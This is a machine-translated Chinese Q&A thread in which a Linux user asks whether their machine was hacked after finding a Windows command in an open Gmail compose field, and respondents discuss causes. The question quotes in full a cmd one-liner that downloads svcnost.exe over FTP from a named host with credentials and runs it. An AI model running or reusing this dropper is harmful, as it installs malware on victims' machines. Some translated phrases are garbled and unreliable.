如何判断我的Linux电脑是否被黑客入侵了?

如何判断我的Linux电脑是否被黑客入侵了?

我家里的电脑通常都开着,但显示器是关着的。今天晚上我下班回家,发现了一个看起来像是黑客入侵的东西:在我的浏览器中,我的 Gmail 是打开的(是我打开的),但它处于撰写模式,字段中显示以下内容TO

md /c echo open cCTeamFtp.yi.org 21 >> ik &echo user ccteam10 765824 >> ik &echo binary >> ik &echo get svcnost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svcnost.exe &exit echo 你被拥有了

在我看来,这看起来像是 Windows 命令行代码,md代码的开头与 Gmail 处于撰写模式的事实相结合,明显表明有人试图运行命令cmd。我想我很幸运,实际上我没有在这台电脑上运行 Windows,但我有其他运行 Windows 的电脑。这是我第一次遇到这样的事情。我不是 Linux 专家,当时除了 Firefox 之外,我没有运行任何其他程序。

我绝对确定这不是我写的,也没有其他人在实际使用我的电脑。此外,我最近将我的 Google 密码(以及我所有的其他密码)更改为类似这样的密码,vMA8ogd7bv因此我不认为有人破解了我的 Google 帐户。

刚刚发生了什么?我的电脑不是我奶奶那台运行了好几年恶意软件的旧 Windows 机器,而是最近安装的 Ubuntu 机器,那么别人怎么会在我电脑上输入密码呢?

更新:
让我来回答一些观点和问题:

  • 我在奥地利的乡下。我的 WLAN 路由器运行WPA2/相移键控以及字典中没有的中等强度的密码;必须是暴力破解,并且距离这里不到 50 米;它不太可能被黑客入侵。
  • 我使用的是 USB 有线键盘,因此,任何人在范围内破解它的可能性都很小。
  • 当时我并没有使用电脑;它只是在我上班时在家里闲置着。它是一台安装在显示器上的上网本电脑,所以我很少关掉它。
  • 这台机器才两个月大,只运行 Ubuntu,我没有使用奇怪的软件,也没有访问奇怪的网站。它主要运行 Stack Exchange、Gmail 和报纸。没有游戏。Ubuntu 设置为保持自身更新。
  • 我不知道是否有任何 VNC 服务正在运行;我当然没有安装或启用过。我也没有启动过任何其他服务器。我不确定 Ubuntu 中是否默认运行任何服务?
  • 我知道 Gmail 帐户活动中的所有 IP 地址。我相当肯定 Google 不是入口。
  • 我发现了一个日志文件查看器,但我不知道要查找什么。帮忙?

我真正想知道的是,并且真正让我感到不安全的是:互联网上的任何人都怎么能在我的计算机上生成按键?我如何才能避免这种情况,而不必对此采取任何隐瞒措施?我不是 Linux 极客,我是一个父亲,已经和 Windows 纠缠了 20 多年,已经厌倦了。在上网的 18 多年里,我从未亲眼见过任何黑客攻击,所以这对我来说是新鲜事。

答案1

我怀疑你有什么可担心的。这很可能是一次 JavaScript 攻击,试图通过下载驱动。如果您担心这种情况发生,请开始使用无脚本AdBlock 插件Firefox 附加组件。

即使访问值得信赖的网站也不安全,因为它们运行来自第三方广告商的恶意 JavaScript 代码。

我抓住它并在虚拟机中运行它。它安装了 mirc,这是状态日志...http://pastebin.com/Mn85akMk

这是一种自动攻击,试图让您下载 mIRC 并加入僵尸网络,然后将您变成垃圾邮件机器人...它让我的 VM 加入并连接到多个不同的远程地址,其中之一是autoemail-119.west320.com

在 Windows 7 中运行它时,我必须接受 UAC 提示并允许它通过防火墙访问。

其他论坛上似乎有大量关于这个确切命令的报告,甚至有人说 torrent 文件在下载完成后试图执行该命令...但我不确定这是如何可能的。

我自己没有用过这个,但它应该能够向你显示当前的网络连接,以便你可以看到你是否连接到了不正常的事物:http://netactview.sourceforge.net/download.html

答案2

我同意@jb48394它可能是一种 JavaScript 漏洞,就像当今的所有其他漏洞一样。

事实上,它试图打开一扇cmd窗户(看@torbengb 的评论并运行恶意命令,而不是在后台秘密下载木马,这表明它利用 Firefox 中的一些漏洞,使其可以输入按键,但不能运行代码。

这也解释了为什么这个漏洞清楚地专为 Windows 编写,也可以在 Linux 上运行:Firefox 在所有操作系统上以相同的方式运行 JavaScript (至少,它尝试这么做:))如果它是由缓冲区溢出或类似的针对 Windows 的漏洞引起的,它就会使程序崩溃。

至于 JavaScript 代码来自哪里——可能是恶意的 Google 广告(广告全天在 Gmail 中循环播放)。 它不会 第一的 时间

答案3

我发现类似的袭击在另一台 Linux 机器上。它似乎是 Windows 的某种 FTP 命令。

答案4

whois据报道,west320.com 归微软所有。

即插即用维诺(系统 -> 偏好设置 -> 远程桌面)结合弱的 Ubuntu 密码?

您是否使用过任何非标准存储库?

防御控制每年都会举办一次 Wi-Fi 竞赛,看 Wi-Fi 接入点的覆盖范围有多远 —— 我听说的最后一次是 250 英里。

如果你真的想感到害怕,那就看看命令控制中心的截图吧宙斯僵尸网络。没有机器是安全的,但 Linux 上的 Firefox 比其他机器更安全。更好的是,如果你运行SELinux

相关内容